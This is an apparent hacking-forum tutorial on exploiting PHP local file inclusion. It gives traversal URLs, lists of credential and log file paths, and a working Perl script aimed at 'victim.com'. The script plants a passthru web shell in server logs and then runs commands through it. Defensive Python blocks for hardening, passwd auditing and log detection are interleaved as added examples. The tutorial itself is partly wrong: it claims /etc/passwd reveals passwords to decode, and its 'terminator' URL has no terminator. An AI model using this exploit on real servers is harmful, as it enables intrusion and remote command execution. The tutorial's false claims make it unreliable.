Aerosol

LFI vulnerability exploitation


In this tutorial you'll learn how to exploit a site vulnerable to LFI.

First of all let's have a look at this small PHP code:

PHP Code :

 <?php
 $page = $_GET['page'];
 include($page);
 ?>

This code should never be used, because it is vulnerable to LFI: the $page variable is not sanitized.
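The hardened counterpart of the include() above, added here as an example (not code from the original post). It is written in Python so it runs stand-alone, but the three checks it performs are exactly what the PHP page needs before calling include(): an allow-list of known page names, rejection of control characters, and a check that the normalised path (with the ".php" the server appends) still lies inside the pages directory. The directory name and page list are constructed; `vulnerable_include` shows what the original code effectively does with the same input.

```python
"""Safe resolution of a ?page= parameter versus the unsanitised original."""
import posixpath
from typing import Iterable, Optional

# Constructed configuration: the only directory includes may come from and
# the page names the application actually knows about.
PAGES_DIR = "/var/www/html/pages"
ALLOWED_PAGES = frozenset({"home", "about", "contact"})


def resolve_include(page: str,
                    pages_dir: str = PAGES_DIR,
                    allowed: Optional[Iterable[str]] = ALLOWED_PAGES) -> Optional[str]:
    """Return the absolute file to include, or None if the request must be refused.

    Like the PHP in the post, the server appends '.php' to the name it is given.
    Pass allowed=None to use only the path-containment check (for applications
    that cannot keep an allow-list); the allow-list is the stronger control.
    """
    # 1. A page name is plain text: no empty value, no control characters
    #    (that covers the null byte).
    if not page or any(ord(ch) < 0x20 for ch in page):
        return None
    # 2. Allow-list: the name must be one the application expects.
    if allowed is not None and page not in set(allowed):
        return None
    # 3. Defence in depth: after normalising '..' segments, the candidate file
    #    must still sit below pages_dir.
    base = pages_dir.rstrip("/") + "/"
    candidate = posixpath.normpath(posixpath.join(base, page + ".php"))
    if not candidate.startswith(base):
        return None
    return candidate


def vulnerable_include(page: str, pages_dir: str = PAGES_DIR) -> str:
    """What include($_GET['page']) amounts to: the raw value is used as a path,
    so '..' segments climb straight out of the web root."""
    return posixpath.normpath(posixpath.join(pages_dir, page))


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"
    print("vulnerable:", vulnerable_include(traversal))   # /etc/passwd
    print("hardened  :", resolve_include(traversal))      # None
    print("hardened  :", resolve_include("home"))         # /var/www/html/pages/home.php
```

The containment check alone already stops the traversal payload from the post; the allow-list additionally stops any file inside the pages directory that was never meant to be reachable through this parameter.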

We take advantage of this vulnerability with this URL:

 site.host/index.php?page=../../../../../../../etc/passwd

If the site is hosted on Unix, user passwords are stored in /etc/passwd, and the above URL shows the usernames and passwords.

Now all you have to do is to decode the password.

An encrypted password entry should look like:

 username:x:503:100:fullname:/home/username:/bin/sh

In this example, the password field is x; as another example of the password field:

 username:!:503:100:fullname:/home/username:/bin/sh
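A parser for the /etc/passwd format shown in the two entries above, added here as an example (not part of the original post). Each line is seven colon-separated fields; the audit function classifies the second field, which is what a defender checks: `x` means the real hash is kept in /etc/shadow (readable only by root), `!` or `*` marks a locked account, an empty field means no password, and anything else is a hash exposed in a world-readable file. The sample file is constructed, and the hash on the `legacy` line is a made-up placeholder.

```python
"""Parse /etc/passwd lines and report which accounts expose a hash."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the same layout as the entries in the post.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
username:x:503:100:fullname:/home/username:/bin/sh
username2:!:504:100:fullname:/home/username2:/bin/sh
legacy:$1$saltsalt$PLACEHOLDERHASHxxxxxxxxxx:505:100:Legacy account:/home/legacy:/bin/sh
nopass::506:100:No password set:/home/nopass:/bin/sh
# comment and blank lines are skipped; malformed lines are skipped too
broken:line:without:enough
"""


@dataclass
class PasswdEntry:
    name: str
    password: str   # second field: 'x', '!', '*', '' or a hash
    uid: int
    gid: int
    gecos: str      # full name / comment field
    home: str
    shell: str


def parse_passwd_line(line: str) -> Optional[PasswdEntry]:
    """Return a PasswdEntry, or None for blank, comment or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(":")
    if len(fields) != 7:
        return None
    name, password, uid, gid, gecos, home, shell = fields
    try:
        return PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell)
    except ValueError:          # non-numeric uid/gid
        return None


def password_field_kind(field: str) -> str:
    """Classify the second field of a passwd entry."""
    if field == "x":
        return "shadowed"       # hash lives in /etc/shadow, not here
    if field == "":
        return "empty"          # account has no password at all
    if field.startswith("!") or field == "*":
        return "locked"         # password login disabled
    return "hash"               # legacy layout: hash is exposed in passwd


def audit_passwd(text: str) -> Dict[str, List[str]]:
    """Group account names by what their password field reveals."""
    report: Dict[str, List[str]] = {"shadowed": [], "locked": [], "empty": [], "hash": []}
    for line in text.splitlines():
        entry = parse_passwd_line(line)
        if entry is not None:
            report[password_field_kind(entry.password)].append(entry.name)
    return report


if __name__ == "__main__":
    for kind, names in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{kind:9s} {names}")
```

On a modern system the audit should list every account as `shadowed` or `locked`; any name under `hash` or `empty` is a finding, since a file-read bug like the one in this post is then enough to recover or bypass that credential.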

Other "places" where you can find passwords besides /etc/passwd are:

 /etc/shadow
 /etc/group
 /etc/security/group
 /etc/security/passwd
 /etc/security/user
 /etc/security/environ
 /etc/security/limits

In case the server appends .php to the included file (so the browser shows a failed inclusion, because /etc/passwd.php does not exist), add a terminator at the end of the path so that the server ignores everything after it:

 site.host/index.php?file=../../../../../../../../etc/passwd

We can run commands on the server by injecting PHP code into its logs and then including them.

Some log locations:

 ../apache/logs/error.log
 ../apache/logs/access.log
 ../../apache/logs/error.log
 ../../apache/logs/access.log
 ../../../apache/logs/error.log
 ../../../apache/logs/access.log
 ../../../../../../../etc/httpd/logs/access_log
 ../../../../../../../etc/httpd/logs/access.log
 ../../../../../../../etc/httpd/logs/error_log
 ../../../../../../../etc/httpd/logs/error.log
 ../../../../../../../var/www/logs/access_log
 ../../../../../../../var/www/logs/access.log
 ../../../../../../../usr/local/apache/logs/access_log
 ../../../../../../../usr/local/apache/logs/access.log
 ../../../../../../../var/log/apache/access_log
 ../../../../../../../var/log/apache2/access_log
 ../../../../../../../var/log/apache/access.log
 ../../../../../../../var/log/apache2/access.log
 ../../../../../../../var/log/access_log
 ../../../../../../../var/log/access.log
 ../../../../../../../var/www/logs/error_log
 ../../../../../../../var/www/logs/error.log
 ../../../../../../../usr/local/apache/logs/error_log
 ../../../../../../../usr/local/apache/logs/error.log
 ../../../../../../../var/log/apache/error_log
 ../../../../../../../var/log/apache2/error_log
 ../../../../../../../var/log/apache/error.log
 ../../../../../../../var/log/apache2/error.log
 ../../../../../../../var/log/error_log
 ../../../../../../../var/log/error.log


OK, now let's look at the log that records pages that do not exist, and at the following code: <?passthru(\$_GET[cmd])?>. If we write in the browser:

 site.host/<?passthru(\$_GET[cmd])?>

we'll obviously get a page saying that this file does not exist on the server, because the browser automatically encodes the URL, and the page we requested is translated by the browser to:

 site.host/<?passthru(\$_GET[cmd])?>

So we have to do something else... We use the following Perl script:

 #!/usr/bin/perl -w
 use IO::Socket;
 use LWP::UserAgent;
 $site = "victim.com";
 $path = "/folder/";
 $code = "<?passthru(\$_GET[cmd])?>";
 $log  = "../../../../../../../etc/httpd/logs/error_log";

 print "Trying to inject the code";

 # First request: the PHP tag goes into the request line and the User-Agent,
 # so the web server writes it into its error/access log.
 $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
 print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
 print $socket "User-Agent: " . $code . "\r\n";
 print $socket "Host: " . $site . "\r\n";
 print $socket "Connection: close\r\n\r\n";
 close($socket);
 print "\nCode $code successfully injected in $log\n";

 print "\nType command to run or exit to end: ";
 $cmd = <STDIN>;
 chomp($cmd);   # strip the newline so it does not end up inside the request line

 while ($cmd !~ "exit") {

     # Following requests: include the poisoned log through the LFI and pass the command in cmd=
     $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
     print $socket "GET " . $path . "index.php?file=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
     print $socket "Host: " . $site . "\r\n";
     print $socket "Accept: */*\r\n";
     print $socket "Connection: close\r\n\r\n";

     while ($show = <$socket>) {
         print $show;
     }

     print "Type command to run or exit to end: ";
     $cmd = <STDIN>;
     chomp($cmd);
 }
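The two things the post describes leave distinctive traces in the web server's own logs: directory-traversal sequences in the request (including URL-encoded ones) and PHP tags planted in the request line or User-Agent for later inclusion. The detector below, an added example that is not part of the original post, runs over a few constructed Apache combined-format log lines and reports which lines show a traversal attempt, a planted PHP tag, or an include of a log file through the traversal. The log lines and IP addresses are constructed; the payload string is the one quoted in the post.

```python
"""Flag LFI and log-poisoning attempts in Apache combined-format access logs."""
import re
from typing import Dict, List, Optional, Set
from urllib.parse import unquote

# Constructed sample: one normal request, two traversal attempts (plain and
# URL-encoded), one poisoning attempt, and one include of the poisoned log.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /folder/<?passthru(\\$_GET[cmd])?> HTTP/1.1" 404 209 "-" "<?passthru(\\$_GET[cmd])?>"
203.0.113.9 - - [10/Oct/2023:13:56:30 +0000] "GET /folder/index.php?file=../../../../../../../etc/httpd/logs/error_log&cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")            # ../ or ..\ after decoding
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|[a-z_])", re.I)  # <?php, <?=, <?passthru ...
LOG_FILE_RE = re.compile(r"(?:access|error)[_.]log\b|/log/", re.I)


def normalise(value: str) -> str:
    """Decode twice so %2F and a double-encoded %252F both become '/'."""
    return unquote(unquote(value))


def parse_line(line: str) -> Optional[Dict[str, str]]:
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify(entry: Dict[str, str]) -> Set[str]:
    """Return the set of reasons a log entry is suspicious (empty if none)."""
    reasons: Set[str] = set()
    request = normalise(entry["request"])
    if TRAVERSAL_RE.search(request):
        reasons.add("traversal")
        # Traversal aimed at a log file is the second stage of log poisoning.
        if LOG_FILE_RE.search(request):
            reasons.add("log_include")
    # A PHP tag in any logged field is an attempt to plant code in this log.
    for field in ("request", "referer", "agent"):
        if PHP_TAG_RE.search(normalise(entry[field])):
            reasons.add("php_tag")
    return reasons


def detect(log_text: str) -> List[Dict]:
    """Scan a log and return one finding per suspicious line."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"line": number, "ip": entry["ip"],
                             "status": entry["status"], "reasons": sorted(reasons)})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Note that the poisoning request itself returns a 404 and looks harmless on its own; it is the PHP tag in the logged fields, and the later traversal to a log path from the same address, that make the pattern recognisable. A `php_tag` hit is also the signal to treat that log file as tainted before anything includes it.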

Source: madleets
